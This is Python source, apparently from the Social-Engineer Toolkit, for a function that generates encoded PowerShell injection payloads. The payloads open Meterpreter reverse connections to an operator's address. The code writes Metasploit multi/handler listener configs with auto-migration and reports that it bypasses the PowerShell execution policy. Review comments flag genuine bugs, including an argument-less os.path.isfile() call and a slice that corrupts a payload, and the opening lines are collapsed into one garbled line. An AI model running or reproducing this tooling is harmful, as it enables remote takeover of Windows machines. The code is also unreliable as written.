# Py2/3 compatibility # Python3 renamed raw_input to input try: input = raw_input except NameError: pass # see if we are tracking emails track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower() # grab the randomized applet name applet_name = core.check_options("APPLET_NAME=") if applet_name == "": applet_name = core.generate_random_string(6, 15) + ".jar" core.update_options("APPLET_NAME=" + applet_name) # define if we are using a custom payload custom = 0 if core.check_options("CUSTOM_EXE="): custom = 1 core.print_status( "Note that since you are using a custom payload, you will need to create your OWN listener." ) core.print_status( "SET has no idea what type of payload you are using, so you will need to set this up manually." ) core.print_status( "If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back." )
def prep_powershell_payload():
    """Build the PowerShell injection string and write it to ``x86.powershell``.

    Reads the relevant config flags (STAGE_ENCODING, AUTO_MIGRATE,
    POWERSHELL_MULTI_INJECTION, POWERSHELL_INJECT_PAYLOAD_X86,
    POWERSHELL_MULTI_PORTS, POWERSHELL_VERBOSE) and run-time options
    (POWERSHELL_SOLO, PORT, PYINJECTION, IPADDR), prompting for the address
    and port when they are not set.  Three generation modes are selected from
    that state: a single payload, one payload per port in
    POWERSHELL_MULTI_PORTS, or one payload per entry in
    ``payload_options.shellcode`` (pyinjection).

    Side effects: may prompt on stdin; may append ``multi/handler`` stanzas to
    ``meta_config`` or ``meta_config_multipyinjector`` under ``core.setdir``;
    writes the final string to ``core.setdir/x86.powershell``; prints status
    messages.  Returns None.
    """
    # grab stage encoding flag
    # Normalised to the literal "true"/"false" expected by the
    # "set EnableStageEncoding" lines written below.
    stage_encoding = core.check_config("STAGE_ENCODING=").lower()
    if stage_encoding == "off":
        stage_encoding = "false"
    else:
        stage_encoding = "true"

    # check to see if we are just generating powershell code
    powershell_solo = core.check_options("POWERSHELL_SOLO")

    # check if port is there
    # NOTE: check_options() is compared against 0 elsewhere in this function,
    # so port may be 0 rather than a string when PORT= is unset.
    port = core.check_options("PORT=")

    # check if we are using auto_migrate
    auto_migrate = core.check_config("AUTO_MIGRATE=")

    # check if we are using pyinjection
    # Normalised to lower-case "on"/"off"; "on" additionally requires the
    # payload_options.shellcode file to exist.
    pyinjection = core.check_options("PYINJECTION=")
    if pyinjection == "ON":
        # check to ensure that the payload options were specified right
        if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
            pyinjection = "on"
            core.print_status("Multi/Pyinjection was specified. Overriding config options.")
    else:
        pyinjection = "off"

    # grab ipaddress
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter the ipaddress for the reverse connection: ")
        core.update_options("IPADDR=" + ipaddr)

    # check to see if we are using multi powershell injection
    multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()

    # turn off multi injection if pyinjection is specified
    if pyinjection == "on":
        multi_injection = "off"

    # check what payloads we are using
    powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")

    # if we specified a hostname then default to reverse https/http
    # (overrides the configured payload whenever ipaddr is not a valid IP)
    if not core.validate_ip(ipaddr):
        powershell_inject_x86 = "windows/meterpreter/reverse_http"

    # prompt what port to listen on for powershell then make an append to the current
    # metasploit answer file
    if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
        # if we have multi injection on, don't worry about these
        if multi_injection != "on" and pyinjection == "off":
            core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
            port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
            if not port:
                port = "443"
            with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
                data = fileopen.read()
            # NOTE(review): the user-entered port is used as a regex pattern and
            # matched anywhere in the file, so this is a substring match rather
            # than an exact "set LPORT" comparison.
            match = re.search(port, data)
            if not match:
                with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                    filewrite.write("\nuse exploit/multi/handler\n")
                    if auto_migrate == "ON":
                        filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                    filewrite.write("set PAYLOAD {0}\n"
                                    "set LHOST {1}\n"
                                    "set LPORT {2}\n"
                                    "set EnableStageEncoding {3}\n"
                                    "set ExitOnSession false\n"
                                    "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))

    # if we have multi injection on, don't worry about these
    if multi_injection != "on" and pyinjection == "off":
        # check to see if the meta config multi pyinjector is there
        if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
            if core.check_options("PORT=") != 0:
                port = core.check_options("PORT=")
            # if port.options isnt there then prompt
            else:
                port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
                if not port:
                    port = "443"
                core.update_options("PORT={0}".format(port))

    # turn off multi_injection if we are riding solo from the powershell menu
    # (solo mode reuses the pyinjection path, i.e. payload_options.shellcode)
    if powershell_solo == "ON":
        multi_injection = "off"
        pyinjection = "on"

    # if we are using multi powershell injection
    if multi_injection == "on" and pyinjection == "off":
        core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")

    # define a base variable
    # x86 ends up holding the final string written to x86.powershell; it is
    # also passed as the last argument to generate_powershell_alphanumeric_payload
    # (its meaning there is not visible from this file).
    x86 = ""

    # specify a list we will use for later
    # Despite the comment this is a str: comma-separated payloads, built with a
    # leading "," by the loop below and stripped with [1:] further down.
    multi_injection_x86 = ""

    # here we do some funky loops so we don't need to rewrite the code below
    # In multi mode `port` is rebound from a str to a list of port strings.
    if multi_injection == "on":
        port = core.check_config("POWERSHELL_MULTI_PORTS=")
        port = port.split(",")

    if multi_injection == "on":
        # iterate through the ports, used for POWERSHELL_MULTI_PORTS
        for ports in port:
            # dont cycle through if theres a blank
            if ports:
                core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
                multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
                if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set LPORT {3}\n"
                                            "set ExitOnSession false\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

                # if we aren't using multi pyinjector
                if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    # if meta config isn't created yet then create it
                    # NOTE(review): os.path.isfile() is called with no argument
                    # and raises TypeError, so this branch is reached only to
                    # fail; presumably the meta_config path used just below
                    # was intended.
                    if not os.path.isfile():
                        with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
                            filewrite.write("")
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set ExitOnSession false\n"
                                            "set LPORT {3}\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

    # here we do everything if pyinjection or multi pyinjection was specified
    if pyinjection == "on":
        injections = []
        # read in the file we need for parsing
        with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
            payloads = fileopen.read()[:-1].rstrip()  # strips an extra ,
        payloads = payloads.split(",")
        # format: payload<space>port
        for payload in payloads:
            # format: payload<space>port
            # (no validation: an entry without a space raises IndexError on
            # payload[1])
            payload = payload.split(" ")
            powershell_inject_x86 = payload[0]
            port = payload[1]
            core.print_status("Generating x86-based powershell injection code...")
            injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
        # NOTE(review): unlike the multi-port loop above, this join produces no
        # leading ",", yet the [1:] slice below is applied to both.
        multi_injection_x86 = ",".join(injections)

    # if its turned to off
    if multi_injection == "off" and pyinjection == "off":
        core.print_status("Generating x86-based powershell injection code...")
        x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)

    # if we are specifying multi powershell injection
    # NOTE(review): on the pyinjection path multi_injection_x86 has no leading
    # comma (see ",".join above), so [1:] removes the first character of the
    # first generated payload instead of a separator.
    if multi_injection == "on" or pyinjection == "on":
        x86 = multi_injection_x86[1:]  # remove comma at beginning

    # check to see if we want to display the powershell command to the user
    verbose = core.check_config("POWERSHELL_VERBOSE=")
    if verbose.lower() == "on":
        core.print_status("Printing the x86 based encoded code...")
        time.sleep(3)
        print(x86)

    # Overwrites any previous result for this run.
    with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
        filewrite.write(x86)

    core.print_status("Finished generating powershell injection bypass.")
    core.print_status("Encoded to bypass execution restriction policy...")